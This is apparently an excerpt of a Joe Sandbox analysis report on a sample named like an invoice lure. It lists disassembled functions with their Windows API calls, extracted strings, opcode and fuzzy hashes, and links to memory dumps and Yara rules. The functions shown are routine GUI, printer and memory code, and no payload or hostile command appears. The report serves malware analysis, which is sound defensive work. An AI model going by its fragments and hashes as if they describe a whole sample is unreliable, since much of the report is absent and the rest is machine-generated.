Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Window$Rect$ChildClientCtrlFromLongPointRealScreen
String ID:
API String ID: 151369081-0
Opcode ID: f09811191985be64d26cedf9fb0e8030ad171f882eaa730c18b7b2860ab10240
Instruction ID: c3d18ae5380d15acd143ae2fa03dd3ee2be66f24667c9a78cd7472b4a4537c71
Opcode Fuzzy Hash: f09811191985be64d26cedf9fb0e8030ad171f882eaa730c18b7b2860ab10240
Instruction Fuzzy Hash: 5321607590161AEBDB118FA99C4DEEFBBF8EF45710B144269F805E3350DB34DA018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00C00E0D, Relevance: 12.1, APIs: 8, Instructions: 65COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 00C00E1B
GetSystemMetrics.USER32 ref: 00C00E29
SetRectEmpty.USER32 ref: 00C00E3C
EnumDisplayMonitors.USER32(00000000,00000000,00C00CA5,00E483D4), ref: 00C00E4C
SystemParametersInfoA.USER32(00000030,00000000,00E483D4,00000000), ref: 00C00E5B
SystemParametersInfoA.USER32(00001002,00000000,00E483F8,00000000), ref: 00C00E88
SystemParametersInfoA.USER32(00001012,00000000,00E483FC,00000000), ref: 00C00E9C
SystemParametersInfoA.USER32(0000100A,00000000,00E4840C,00000000), ref: 00C00EC2

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: System$InfoParameters$Metrics$DisplayEmptyEnumMonitorsRect
String ID:
API String ID: 2614369430-0
Opcode ID: c027d6560e12c28e66633e0ac76ec94be35a614989b730f9dd1b2eaac2164a31
Instruction ID: 47eb35191d67841083ac7533a77c4f4803ffb71f7f5d8d83265a5b3ccca87070
Opcode Fuzzy Hash: c027d6560e12c28e66633e0ac76ec94be35a614989b730f9dd1b2eaac2164a31
Instruction Fuzzy Hash: D52127B4201616FFE7058F709C89AE3BBECFF49345F004229A599D6280DBB42944CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BAE611, Relevance: 12.1, APIs: 8, Instructions: 60memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32 ref: 00BAE625
lstrcmpA.KERNEL32(?,?), ref: 00BAE635
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 00BAE64A
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00BAE66A
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00BAE672
GlobalLock.KERNEL32 ref: 00BAE67C
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 00BAE68D
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 00BAE6A5

Part of subcall function 00BC8DE1: GlobalFlags.KERNEL32(?), ref: 00BC8DEE
Part of subcall function 00BC8DE1: GlobalUnlock.KERNEL32(?,?,?,?,00C0784C,?,00000038,00C062E5,00000000,?,?,00BC9680,?), ref: 00BC8DFC
Part of subcall function 00BC8DE1: GlobalFree.KERNEL32 ref: 00BC8E08

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: a50992321f2babac6dbeb4b9bda4cf04fe16a6c2602bbdbe2fc941386e6e4ee0
Instruction ID: 14b441d9700532e773daeb0352d42e40cb5cc5f238eda8ef6e773f417d119ce0
Opcode Fuzzy Hash: a50992321f2babac6dbeb4b9bda4cf04fe16a6c2602bbdbe2fc941386e6e4ee0
Instruction Fuzzy Hash: 811148B1500608FFEF266FA4CD85EAABBEDEF10745B00496ABA1292131D771DD50DB30

Uniqueness

Uniqueness Score: -1.00%

Function 00BA4B32, Relevance: 12.0, APIs: 8, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GlobalSize.KERNEL32(?), ref: 00BA4B3B
GlobalAlloc.KERNEL32(00002002,00000000), ref: 00BA4B53
GlobalLock.KERNEL32 ref: 00BA4B63
GlobalLock.KERNEL32 ref: 00BA4B6C
GlobalSize.KERNEL32(?), ref: 00BA4B79

Part of subcall function 00BA5B63: _memcpy_s.LIBCMT ref: 00BA5B72

GlobalUnlock.KERNEL32(?), ref: 00BA4B8A
GlobalUnlock.KERNEL32(?), ref: 00BA4B93
GlobalSize.KERNEL32(?), ref: 00BA4BA3

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Global$Size$LockUnlock$Alloc_memcpy_s
String ID:
API String ID: 3833998449-0
Opcode ID: d610480b4b1a3248828ad89dd8a61c2e8fb90fd03e21e22a8d0046144c7db186
Instruction ID: 3e3c1fda0f6a58cecd71584e8c3b6310b5d9a47db136314865b47745b75548e4
Opcode Fuzzy Hash: d610480b4b1a3248828ad89dd8a61c2e8fb90fd03e21e22a8d0046144c7db186
Instruction Fuzzy Hash: BF01167A500314FBE7102BA5AC88DAA7FEDEB492A67404664FA0BD3321DB718D008A70

Uniqueness

Uniqueness Score: -1.00%

Function 00C04104, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 261windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C05C3C: GdipGetImagePixelFormat.GDIPLUS(?,?,00000000,00000000,?,00C04148,4B5C1563,00000000,00000000,?), ref: 00C05C4A

Part of subcall function 00C05BF0: GdipGetImagePalette.GDIPLUS(?,00000000,00000000,?,?,00C04267,00000000,?,00000000,00000000,00000000,?,00000000,00000000,00000000,4B5C1563), ref: 00C05BFF

GdipBitmapLockBits.GDIPLUS(?,?,00000001,?,00000000,00000000,00000000,?,00000000,00000000,00000000,4B5C1563,00000000,00000000,?), ref: 00C0435C
GdipBitmapUnlockBits.GDIPLUS(?,00000000,?,?,00000001,?,00000000,00000000,00000000,?,00000000,00000000,00000000,4B5C1563,00000000,00000000), ref: 00C0440C
GdipDrawImageI.GDIPLUS(?,00000000,00000000,00000000,?,?,00000082,?,00022009,?,00000000,00000000,?,00000000,00000000,00000000), ref: 00C0445E
GdipDeleteGraphics.GDIPLUS(?,?,00000000,00000000,00000000,?,?,00000082,?,00022009,?,00000000,00000000,?,00000000,00000000), ref: 00C04469
GdipDisposeImage.GDIPLUS(?,?,?,00000000,00000000,00000000,?,?,00000082,?,00022009,?,00000000,00000000,?,00000000), ref: 00C04474

Part of subcall function 00D713B9: _free.LIBCMT ref: 00D713CC

Strings

&, xrefs: 00C0418C

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Gdip$Image$BitmapBits$DeleteDisposeDrawFormatGraphicsLockPalettePixelUnlock_free
String ID: &
API String ID: 1813503695-3042966939
Opcode ID: b6adcdb3678a6ae489cddb34598fa83025e92051df980f60e5c33411023c6c79
Instruction ID: 455eb5e62436812e6f003feeb3ea3e167826aa2768a73f1c0a9ee29dbe261d67
Opcode Fuzzy Hash: b6adcdb3678a6ae489cddb34598fa83025e92051df980f60e5c33411023c6c79
Instruction Fuzzy Hash: 74A164F1A001299FCB28DF54CC90BAEB7B9EF44314F5441E9EA19A7251D7309E85CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 00BA5087, Relevance: 10.7, APIs: 7, Instructions: 218memoryCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BA508E
CoTaskMemAlloc.OLE32(00000010,?,00000000,00000000,?,00000024), ref: 00BA51B0
GlobalLock.KERNEL32 ref: 00BA52BD
GlobalLock.KERNEL32 ref: 00BA52D0
GlobalUnlock.KERNEL32(?,?,00000024), ref: 00BA52DD

Part of subcall function 00BA5087: GlobalUnlock.KERNEL32(?,00000000,00000000,?,00000024), ref: 00BA52F1
Part of subcall function 00BA5087: GlobalUnlock.KERNEL32(?,?,00000024), ref: 00BA52FA

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Global$Unlock$Lock$AllocH_prolog3_Task
String ID:
API String ID: 2109838362-0
Opcode ID: 9bf8b6f736ec397200998e94ccc1ebc835b7d59129dc597cc75433449beb5c85
Instruction ID: 6fd658b4f47454a8978286847a7b47e5309c01e9d010de53e109f92628c4553c
Opcode Fuzzy Hash: 9bf8b6f736ec397200998e94ccc1ebc835b7d59129dc597cc75433449beb5c85
Instruction Fuzzy Hash: 12815B35904616DFDB20EF98C885AEEB7F8EF49714B044095F945EB352D734EA11CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BB3026, Relevance: 10.7, APIs: 7, Instructions: 214COMMON

Download Yara Rule

APIs

GetObjectType.GDI32(?), ref: 00BB30A9
GetStockObject.GDI32(0000000D), ref: 00BB30B5
SelectObject.GDI32(?,00000000), ref: 00BB30C4
SelectObject.GDI32(?,?), ref: 00BB30D3
PlayMetaFileRecord.GDI32(?,?,?,?), ref: 00BB31B3

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Object$Select$FileMetaPlayRecordStockType
String ID:
API String ID: 4008327421-0
Opcode ID: e1952558b5490c03e39f6d1bf94329646aa5ac0402e199c9be7163dbecc7e3a9
Instruction ID: 65650d8f2a297104c73f954f2d6aa1b7c3ca4b43030230ec923b75bfda43dcd1
Opcode Fuzzy Hash: e1952558b5490c03e39f6d1bf94329646aa5ac0402e199c9be7163dbecc7e3a9
Instruction Fuzzy Hash: F481F676500616EFCB44CF98C8888BEBBF9FF487117184195E906EB211D774EE91DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00BF8946, Relevance: 10.7, APIs: 7, Instructions: 213COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BF894D

Part of subcall function 00BBEFF0: GetParent.USER32(?), ref: 00BBEFFE
Part of subcall function 00BBEFF0: GetParent.USER32(?), ref: 00BBF011
Part of subcall function 00BBEFF0: GetParent.USER32(?), ref: 00BBF02B
Part of subcall function 00BBEFF0: SetFocus.USER32(?,00000000,?,?,?,?,?,?,80004005), ref: 00BBF044

GetClientRect.USER32 ref: 00BF8978
SetCapture.USER32(?), ref: 00BF89A3

Part of subcall function 00BFB7BB: IsRectEmpty.USER32(?), ref: 00BFB7E3
Part of subcall function 00BFB7BB: InvertRect.USER32(?,?), ref: 00BFB7F1
Part of subcall function 00BFB7BB: SetRectEmpty.USER32 ref: 00BFB803

SetCapture.USER32(?), ref: 00BF89F1
PtInRect.USER32(?,?,?), ref: 00BF8AD6
GetCapture.USER32 ref: 00BF8B00
ReleaseCapture.USER32 ref: 00BF8B0A

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Rect$Capture$Parent$Empty$ClientFocusH_prolog3_InvertRelease
String ID:
API String ID: 636197404-0
Opcode ID: ed49b9b9e4a5b2596431f2860cf73a0b1ee564bab5df427909809d4e0b55e9ce
Instruction ID: c270753dcb742abfab4504cad9d7470c8e869dd286d75650ccc27f94e3ff554e
Opcode Fuzzy Hash: ed49b9b9e4a5b2596431f2860cf73a0b1ee564bab5df427909809d4e0b55e9ce
Instruction Fuzzy Hash: 8F815875A00719DFCF059FA4C888ABE7BE5FF08310F1445A9F906AB252CF35A944CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00BE486D, Relevance: 10.7, APIs: 7, Instructions: 211COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00BE4877
__mbsinc.LIBCMT ref: 00BE48E0
__mbsinc.LIBCMT ref: 00BE48EF
__mbsinc.LIBCMT ref: 00BE4943
__mbsinc.LIBCMT ref: 00BE49A4
__mbsinc.LIBCMT ref: 00BE49FE
_strlen.LIBCMT ref: 00BE4A87

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: __mbsinc$H_prolog3__strlen
String ID:
API String ID: 522793446-0
Opcode ID: 9de62775e0690c104f1491b4be5180d0f6cc16a364d5d523e44485ba34d60a00
Instruction ID: 79b1e6b0ce844a6bca05bc2e6cea933e55bfed5e912c196e3641dcf7376f6e96
Opcode Fuzzy Hash: 9de62775e0690c104f1491b4be5180d0f6cc16a364d5d523e44485ba34d60a00
Instruction Fuzzy Hash: CA8190B1900158AFDB25EA64CC85FE9B3F8EF05314F0440D9E649A7282DB709EC9CF69

Uniqueness

Uniqueness Score: -1.00%

Function 00BE4B54, Relevance: 10.7, APIs: 7, Instructions: 176windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BE4B5B
WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000), ref: 00BE4C34
CoTaskMemFree.OLE32(?,000000FF), ref: 00BE4C5A
GetParent.USER32(?), ref: 00BE4CC0
SendMessageA.USER32(?,00000464,00000104,00000000), ref: 00BE4CE9
GetParent.USER32(?), ref: 00BE4D0F
SendMessageA.USER32(?,00000465,00000104,00000000), ref: 00BE4D35

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: MessageParentSend$ByteCharFreeH_prolog3MultiTaskWide
String ID:
API String ID: 1738611249-0
Opcode ID: 922b93caca0f8d2bec2ff307ef0965ddaf8ad601095b35d79bfe636955fb82c3
Instruction ID: 5e516a5ed8f416c79973b148524e739f32fbcf922e8a3d1a789ae5d4275a8cd8
Opcode Fuzzy Hash: 922b93caca0f8d2bec2ff307ef0965ddaf8ad601095b35d79bfe636955fb82c3
Instruction Fuzzy Hash: 57516071A0061AEFDB04DFA5CC85EAEB7F4FF45710B1042A8F525A72A1DB30AD01CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00BF4EA4, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 144COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BF4EAB

Part of subcall function 00BA412F: _memcpy_s.LIBCMT ref: 00BA4195

Strings

%lf, xrefs: 00BF4F88
%Tc, xrefs: 00BF5032
*** error ***, xrefs: 00BF4FF4, 00BF4FF9, 00BF5001
%ld, xrefs: 00BF500F

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: H_prolog3_memcpy_s
String ID: %Tc$%ld$%lf$*** error ***
API String ID: 1212206098-3633636148
Opcode ID: 176c3ab4faed3bdcfcb955ebc10e2a4e204cde867b17c4a54e3cf556bdc1d482
Instruction ID: 86531fcead82524d9641980fe16779327b7c6f5d6524f0b5200d6d611ba8f1d6
Opcode Fuzzy Hash: 176c3ab4faed3bdcfcb955ebc10e2a4e204cde867b17c4a54e3cf556bdc1d482
Instruction Fuzzy Hash: A551F27140050A9BCF18DF78CC99ABE77A9FF11300F0804D9EA15AB292DB74DA58CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00C2C67C, Relevance: 10.6, APIs: 7, Instructions: 142COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00C2C683

Part of subcall function 00C247BE: __EH_prolog3.LIBCMT ref: 00C247C5
Part of subcall function 00C247BE: SetRectEmpty.USER32 ref: 00C249BB

SetRectEmpty.USER32 ref: 00C2C80C
SetRectEmpty.USER32 ref: 00C2C813
SetRectEmpty.USER32 ref: 00C2C846
SetRectEmpty.USER32 ref: 00C2C8B0
SetRectEmpty.USER32 ref: 00C2C8BD
SetRectEmpty.USER32 ref: 00C2C8CA

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: EmptyRect$H_prolog3
String ID:
API String ID: 3752103406-0
Opcode ID: e08c58af09769420d7104e6d38407dee76002747976eb2de9cc7663de13865c9
Instruction ID: dfaf19d725c7057f53ebc6f8491c9c14634814709b3aa8d558f6243ab23ab12c
Opcode Fuzzy Hash: e08c58af09769420d7104e6d38407dee76002747976eb2de9cc7663de13865c9
Instruction Fuzzy Hash: 8471CAB4805B15CFCB65DF69D48868AFBF4BB08300F14896EE4AEAB311C7746A00CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00BFEC06, Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 141COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 00BFEC51

Strings

MFCVSListbox_BrowseButton, xrefs: 00BFEC87
MFCVSListbox_NewButton, xrefs: 00BFECB0
MFCVSListbox_UpButton, xrefs: 00BFED11
MFCVSListbox_RemoveButton, xrefs: 00BFECE1
MFCVSListbox_DownButton, xrefs: 00BFED41

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: H_prolog3
String ID: MFCVSListbox_BrowseButton$MFCVSListbox_DownButton$MFCVSListbox_NewButton$MFCVSListbox_RemoveButton$MFCVSListbox_UpButton
API String ID: 431132790-4178308353
Opcode ID: 4a9a6bf3e52f031c2a9bb02632ad1af45ae06ea61147998d56752a2ee362c6a9
Instruction ID: 7d8926f0e8b4054b839f642cc0492a4cad2e8f4fa3c6c3cba2dbc03350097535
Opcode Fuzzy Hash: 4a9a6bf3e52f031c2a9bb02632ad1af45ae06ea61147998d56752a2ee362c6a9
Instruction Fuzzy Hash: 5F419175E0021E9ADF14DAA4C885AFEB7F8EF05324F14456AFA31A31E0D770DD08CA61

Uniqueness

Uniqueness Score: -1.00%

Function 00C02B6B, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00C02B72

Part of subcall function 00BB274F: __EH_prolog3.LIBCMT ref: 00BB2756
Part of subcall function 00BB274F: GetWindowDC.USER32(00000000,00000004,00C01693,00000000), ref: 00BB2782

CreateCompatibleDC.GDI32(00000000), ref: 00C02BAA
CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 00C02C33
CreateCompatibleBitmap.GDI32(?,?,?), ref: 00C02C4D

Part of subcall function 00BB44E2: SelectObject.GDI32(?,00C3F98C), ref: 00BB44EB

FillRect.USER32 ref: 00C02C98

Strings

(, xrefs: 00C02C04

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682869622.0000000000DBE000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.682920663.0000000000E33000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682930092.0000000000E3E000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682937333.0000000000E40000.00000008.00020000.sdmp Download File
Associated: 0000000D.00000002.682945587.0000000000E46000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.682952195.0000000000E4B000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_b90000_important invoice presentation nov 2021.jbxd

Similarity

API ID: Create$Compatible$BitmapFillH_prolog3H_prolog3_ObjectRectSectionSelectWindow
String ID: (
API String ID: 2680359821-3887548279
Opcode ID: f2909f27d90d760e70f31d0d040c2d10f39b0ea88cebae49d81261d7b9325fb5
Instruction ID: 542e67cb0eb6a9d9c758dbc24eb44281ab41b51dab4f9eb180342754b29ff4e8
Opcode Fuzzy Hash: f2909f27d90d760e70f31d0d040c2d10f39b0ea88cebae49d81261d7b9325fb5
Instruction Fuzzy Hash: F451F571D00218DBEF24DFA5CD49AEEBBB5FF04300F10816AE416AB291DB749A09CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00D5CC20, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00D5CC57
___except_validate_context_record.LIBVCRUNTIME ref: 00D5CC5F
_ValidateLocalCookies.LIBCMT ref: 00D5CCE8
__IsNonwritableInCurrentImage.LIBCMT ref: 00D5CD13
_ValidateLocalCookies.LIBCMT ref: 00D5CD68

Strings

csm, xrefs: 00D5CCFD

Memory Dump Source

Source File: 0000000D.00000002.682636914.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true

Associated: 0000000D.00000002.682631453.0000000000B90000.00000002.00020000.sdmp Download File
